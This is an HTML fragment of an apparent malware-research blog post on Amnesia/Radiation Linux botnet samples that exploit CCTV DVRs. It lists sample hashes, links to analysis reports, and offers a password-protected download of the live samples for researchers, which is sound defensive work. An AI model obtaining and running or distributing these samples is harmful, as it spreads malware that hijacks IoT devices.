<tr class="tableizer-firstrow"><th style="background-color: #02080e; color: white; text-align: left;">SHA256</th><th style="background-color: #02080e; color: white; text-align: left;">SHA1</th><th style="background-color: #02080e; color: white; text-align: left;">MD5</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1acf5a461ee16336eb8bbf8d29982c7e26d5e11827c58ca01adac671a28b52ad</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6001b34c17c122d201613fffd846b056614b66da</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e03234c2259c474aeb69500423ddeed7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">290a1b89517dec10bfd9938a0e86ae8c53b0c78ed7c60dc99e4f8e5837f4f24a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">32800c10588053813f55bf8c87771311c5f7f38e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2df4c1cf093c8373a8f2f194e77b69a2</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7937a1068f130a90b44781eea3351ba8a2776d0fede9699ba8b32f3198de045b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a2a67b06344e4f1cf85086f6b584316ec53d5e54</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8368f1c4d8f0d908f5f4ff671df5f1da</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">87e44bca3cc360c64cc7449ec1dc26b7d1708441d471bf3d36cd330db3576294</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2fe5483e6b82220eeeef12e531eb3347fea16ac1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1082ce517dd23eee335bedfc6bcd8205</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cf97d52551a96dacb089ac41463d21cab2b004ba8c38ffc6cb5fb0958ddd34db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5b79a15cb61f5260f0b9d807faa160e6d49590e4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b5fdf9653eb1ffbdae8cb4f1f2d71747</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">79aa23c5a25c7cdbaba9c6c655c918dac3d9823ac62ebed9d7d3e94e1eaafc07</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4a279a6b82fe801d3c8be9d16df2ef5623b17704</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0029ab0fd56cd7e493b46a331ef18bd3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">03d703f6d341be258ac3d95961ff0a67d4bf792f9e896530e193b091dca29c2e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a9740352af2c9cc926deba7dffc452f213f7f05f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a462aac76def5b53351b3b1ddb41124c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a368b6755e62e5c0ff79ea1e3bd146ee8a349af309b4acf0558a9c667e78293a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e16167ab646381c277c2ca84319ceb57bacb2c92</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c4cdc7665adb1cda5897d4df4a560f88</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ba933cefbe9a8034f0ba34e7d18481a7db7451c8ef4b6172fb0cad6db0513a51</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">00749407e97085af470c75ef004f2235d30af44f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c26a3f2317507a09d91014469b045384</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3ba3c528d11d1df62a969a282e9e54534fb3845962672ad6d8bbc29cb6d062f5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b8100890c0f1894544b3f99168377ec46c38e911</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4a0607b4488cd539b8b0b443abd121e3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b763054180cd4e24c0a78b49055ad36dbc849f1a096cddf2db8cee0b9338c21d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7bec99308ce4bf409417b642cd9432000a5c19d2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2dfb1d606e5539399aa1a536baafd2f8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d5ce4b04b7eec6530a4a9d40510177468fadc235253e5a74530a8c9d990f3c50</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">27fc204ffa42262b7570b6fccb435d4d38a3610f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c5d8b73da810646407c333fe52186281</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">965a5949d8f94e17ebcd4cb6d0a7c19f49facbfc1b1c74111e5ceb83550d6c8f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7698584b2e7c62061447a6a2583ed6957180c205</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e7ebe4411664672359b393f530fc2fc1</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">44134b9d4b10d94f6381b446a1728b116d62e65c1a52db45235af12caf7e38c0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fd114077927d501606575ba9ab38ecfb3407d432</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a4388980d7e3539d74a950dab23d00ac</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">848d76a227f4fe282b7ddfd82a6dfc4c25da2735a684462b42fe4e1c413d8e34</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">135cee7610890497183eb6251efef307ea013fe1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7bb23077b4f80df48b91b425eda05828</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5ca0a957fe6c253827f344da4ba8692d77a4e21a1df4251594be2d27d87dd8ae</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d231874332ca462fb462e4f68450d2c2c22d4bcd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dda77b3f3f74a2bdffd167917686e139</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">016fa511f6546ed439d2606c6db8821685a99f5a14ef3f710668b58dc89c6926</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5c83749c62ee0131710bf26931cb1e463a8fbda3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b0c34df85677d8f752dc1e1a5eeba0c9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">22be594fbfa878f631c0632f6c4d260b00918817ff66a1f9f15efe44c1a58460</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">856d635fca52631305f1fefc58eafa74496524b6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">60ebf41953d5c6e212fc306cdb0c6519</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f3571ec66288405dab43332ca03812617f85fb08832fbbe1f1d89901fe034b8a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">819485e20d841195e2e8a7ae5b41ff709887bb21</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6984d37863c08b9fdd969297d35d3538</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">04c949eca23103b1de05278b49f42c3ab6b06f4bf20aafa5f2faefaa84c16ecd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0487db2df1802dd4ee4ae3b62b5f08937dd5c77c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4366ee61cbd7e636aea8540836a60036</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d6fc04acda8f33a6d35eb577c27754c2f2b4d6f4869576c7c4e11b2c5e9b0176</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">83ae89826114662dad8553d5eeed5217b57047f2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2bc964e294d7ab314c34e5934d91a5a9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18c0bd4dd98008383fc52045ad896449fa7f0037593bb730ed1ef88aa547006d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bcaa05b60a9d625852ac4f2d0d805ab164988155</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35d9f08c39c4cf396427f3a345e5c09a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4c9d5469e9095813418260045c2b11e499e4eaa0ffb25293f90f580c464157df</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4c6aacc0b893ed366f9f307326e59efa61e51534</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">50dddaf7e5bb24aabf66eecd0c8b79cf</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0b5f1fbc05dc8baca492b748adeb01fb4904e02723b59211ecde222f7b12d91e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">87f898e0d41c0f2c22d4e9278a942326877fc368</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">da780b72140535d4c2d391e76dc8181d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">31ad5c4547ceae4d0550c8460524c16a6105afc056760e872c4966656256c9dc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">37f485d3fa8f6cf13061cb1ea38ae0d5d2edfd95</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">134aefcf640c24a1ab5344a96150fb05</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">edb00a0e5ff70e899857549e3263c887a799416c8bbab43ab130ca1be9bbd78c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">42c30dc551a3cb3bc935c0eae79b79f17942e439</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c2722241f765d2ad4fb58edd76a4adea</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">96f852b81760a425befaa11ea37c0cdea2622630bf2a0c94bb95042211ab614d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5d9782064bc38d40c88f32c0410479cbd61caa40</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f332cfcda8c0ef579ede59eff23caa1e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">57fd171a5b1a88e9583b42439851a91a940eb31105ab29cb314846da2ed43b82</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0bfec2059823b936d782bea7bc16abd9923dddb5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6fff82df7a565b4570d299486697310f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">277018b2cc6226dca6c7678cac6718c8584f7231340ad8cd7c03477559fdf48b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">261f916ce97ffc6817a4772705df68e6ccca8181</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">009dc7d8766a85d85bb6a26ee69b66fe</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e968affb1fc7756deb0e29807a06681d09a0425990be76b31816795875469e3d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cf78484a999183324da9affdf2aaeff508d1dc47</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3e1b8f6313447b8a4b49671ddeb8a4ee</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4b1ccf6b823ee82e400ba25b1f532cd369d7e536475a470e2011b77ffeaf7bb3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bc988f7cd32d411f2a9888afc72c7a892e2a1def</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55128a3da6f70129acdbf9dbe955cfe7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fc84d6636a34ad1a11dbaa1daec179e426bdcd9887b3d26dc06b202417c08f95</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1df31bec02e35c9a4656bb3a3bdf631bb37605a8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55d77ab16377a8a314982f723fcc6fae</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9ca15f15fbae58cb97b0d48a0248461e78e34e6d530338e3e5b91f209a166267</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8505dfaad6d10b84c73544eb748d547cb5bad9bd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ebc12c530dab0a65c37ffd72612fa705</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">31f3a402c1662ed6adffbf2b1b65cf902d1df763698eb76d21e4e94b4c629714</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18c972722d984ff6da2bc26a0aca4c7f209cc39c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">05bbf6e72b5b24c0c81e0671bf17b1e7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8d9f124ddd69c257189f1e814bb9e3731c00926fc2371e6ebe2654f3950ca02e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">553cd98c83e945ee3013aa40897baec0305b34a2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b4030025e039c54c2d3923057447494c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a0923d7645604faaa864a079adeb741a5d6e65507a2819b2fee4835d396077d9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f8e6995e28c789d8b24e982ac53d5d6ba453de73</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b796f85c8a7de71407d6e3c4206edda3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a19b790ea12f785256510dde367d3313b5267536a58ca0c27dbdac7c693f57e1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a92f7393daf7ead9a44b12e35f850705798fc879</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a6defec886d31f6375712466dd794a96</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f030fb4e859ee6a97c50c973a73dced3640befe37f579cfd15367ce6a9bbede2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ad3a1e779f02539ccd07bff735e0823add9730b2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c259564a8fe72333604a5686e30f6242</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f01db6d77ac21211992ceae4e66e1e03c1cb39d61e03645b9369f28252ca7693</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14c6bf63ff4d32d8a0a42e81ea39304fb7ab13c8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">80fe593ef5538fbf66b3b3e1cb7b9b8b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dfe3d0e95feaed685a784aed14d087b019ba2eb0274947a840d2bdbae4ae3674</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2107d057478328df8f538102508de00b0c4b37c7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b5a85a0e7a2c4197c3794c8bb2eb5763</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bf6083040ca51e83415f27c9412d9e3d700bd0841493b207bc96abf944ab0ca7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">09a695ce6c35c029dd7577e29f403d7144698b41</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7a2edceb31a9c0d05e5f13c6caee0576</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b154151dc8ace5c57f109e6bb211a019db20c4f0127c4d13c7703f730bf49276</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c0cda049c85493df4e97db3db4ddc94075ba62c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b6a895ac5ba5b6472680d47410a238a5</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6bf6b1bde63cee9b81902efd187fdd56ecee5853754ce0a19d5ab5c3b0242988</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6e2d4f0bcc97ce130ae89647f648d3e96548a391</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a29f9d176b913e7f693355700aaadbb9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0dcf547bd8f4074af97416d8b84ea64b2f3319064aa4bce64ad0c2e2d3957175</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a996b925e9391a69140caf6e4adba928694ffe66</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dd575413a40839f2807593aa21c71152</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6cff1249cc45b61ce8d28d87f8edc6616447e38168e610bed142f0b9c46ea684</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9baa823deb9075e8df77b891115c019244de09de</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">488bb5c0739485721182c01a82b01d14</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5b5ebe019806885bbaafe37bc10ca09549e41c240b793fd29a70690a5d80b496</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3d46711f9064b96ff2d0affdef1ecd82d120659d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b95e2d8a8509ac05f5445d18d32cc7cb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">103d87098c9702cab7454b52869aeeb6a22919f29a7f19be7509255ce2d8c83e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e29a163488438c9ea9014ddf1a9b2d382cc5d7e6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">baf2587fafaedbab4a78b9b7fd8b55f8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c73675005a09008bc91d6bc3b5ad59a630ab4670dca6ac0d926165a3ecfd8d92</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d8ea2280cd06a5cc32b7d668e2b4b2e68f3a7e2a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">98ecc6fbb2cb5649daf751fcbfb81bcb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ef623aadd50330342dc464a31b843b3d8b5767d62a62f5e515ac2b380b208fbe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">620ff5a7aaf7f3fcf4abc9365e0e77b3ec4b434d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b14535c5835c9dfb3cbbc7f6fef6034c</td></tr>
</tbody></table>
</div>
<div class="ad-unit" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 1em 0px; padding: 0px; text-align: center; vertical-align: baseline; width: 2463px;">
<ins class="adsbygoogle" data-ad-client="ca-pub-7932050359867089" data-ad-format="auto" data-ad-slot="5937817505" data-adsbygoogle-status="done" style="display: block; height: 280px; margin: 0px auto; width: 728px;"><ins id="aswift_1_expand" style="border: none; display: inline-table; height: 280px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 728px;"></ins></ins></div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-75837737786312334872019-10-06T17:16:00.006-04:002023-01-21T01:17:47.532-05:00Amnesia / Radiation Linux botnet targeting Remote Code Execution in CCTV DVR samples<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div dir="ltr" trbidi="on"><div style="text-align: left;"> </div>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYN4lcqi9-gP2xTNg1SHkL6jOwXEMb91AR-DzvJ0aXYC2Wq3j8ArAqt7lUNVXuTDwmjwzC4nfofvqn2fnkAdvHjsofVCvqeqZ6Pf_invvh3J-PJfSCNTb-71977bjz7gduki--T61Z1ED8Y07H-bMLCoWZT98GvITjd5Hf1739Iww8tzgzN6FormSi/s423/image%20(4).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" data-original-height="423" data-original-width="355" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYN4lcqi9-gP2xTNg1SHkL6jOwXEMb91AR-DzvJ0aXYC2Wq3j8ArAqt7lUNVXuTDwmjwzC4nfofvqn2fnkAdvHjsofVCvqeqZ6Pf_invvh3J-PJfSCNTb-71977bjz7gduki--T61Z1ED8Y07H-bMLCoWZT98GvITjd5Hf1739Iww8tzgzN6FormSi/w242-h260/image%20(4).png" width="242" /></a></div>
<span style="font-family: inherit;"><span style="text-align: left;"><div style="text-align: center;"><span style="text-align: left;">Amnesia / Radiation botnet samples </span></div></span></span></div><div style="text-align: center;"><br /></div>
<div dir="ltr" trbidi="on">
<br /></div>
<div dir="ltr" trbidi="on"><a href="http://contagio.deependresearch.org/read/Crime_2016_Amnesia_Remote+Code+Execution+in+CCTV-DVR+affecting+over+70+different+vendors.pdf.pdf">Remote Code Execution in CCTV DVR (kerneronsec.com - 2016)</a></div><div dir="ltr" trbidi="on"><br /></div>
</div>
<div dir="ltr" trbidi="on">
<a href="http://contagio.deependresearch.org/read/Crime_2017_New+IoT_Linux+Malware+Targets+DVRs%2C+Forms+Botnet.pdf">2017-04-06 Palo Alto Unit 42. New IoT/Linux Malware Targets DVRs, Forms Botnet</a></div><div dir="ltr" trbidi="on"><br /></div>
<div dir="ltr" trbidi="on">
2016-08-11 <a href="http://contagio.deependresearch.org/read/Crime_2017_CyberX_-_Campaign_Radiation-1.pdf">CyberX Radiation IoT Cybersecurity campaign</a></div>
<div dir="ltr" trbidi="on"><br /></div><div dir="ltr" trbidi="on"><div><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /><span style="font-family: inherit;"><a href="http://contagio.deependresearch.org/crime/Linux_Amnesia_samp.zip">Download. Email me if you need the password (see in my profile)</a></span></div></div>
<div dir="ltr" trbidi="on">
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="background-color: white; color: #660000; font-family: verdana; font-size: 14px; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a><br /></span><span><a name='more'></a></span>
<span style="font-family: inherit;"></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 20, 2023</span><br />
<div style="background-color: #618f2b; line-height: 19px; text-align: center;">
<div style="margin: 0px;"><br /></div></div></div><div dir="ltr" trbidi="on"><div style="line-height: 19.6px;"><div style="line-height: 19px;"><div>
<span style="font-family: inherit;">
</span> <span style="font-family: inherit;"><a href="https://www.blogger.com/null" name="more"></a></span></div>
<div>
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b><span style="font-family: inherit;">Hashes</span></b></div>
<div style="background-color: white; font-size: 14px;">
</div>
</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; font-family: Arial, Helvetica, sans-serif; font-size: 12px; margin: 0px auto; text-align: center;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: black; color: white; text-align: left;">MD5</th><th style="background-color: black; color: white; text-align: left;">SHA256</th><th style="background-color: black; color: white; text-align: left;">SHA1</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">74bf554c4bc30d172cf1d73ac553d766</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">06d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f0374</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">3c40221177383da576b11a0b3f6b35d68a9cde74</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5dd9056e5ab6a92e61822b6c04afd346</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">10aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c865dd67853a24fd86ef74b05140827c1d5fd0bd</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2b486466f4d3e30f7b22d0bc76cb68f9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">ed62f6d1588bea33c20ababb42c02662d93d6015</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">3411bb2965f4c3d52c650aff04f48e52</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1e0281178b4a9d8dec74f50a7850867c87837435</td></tr>
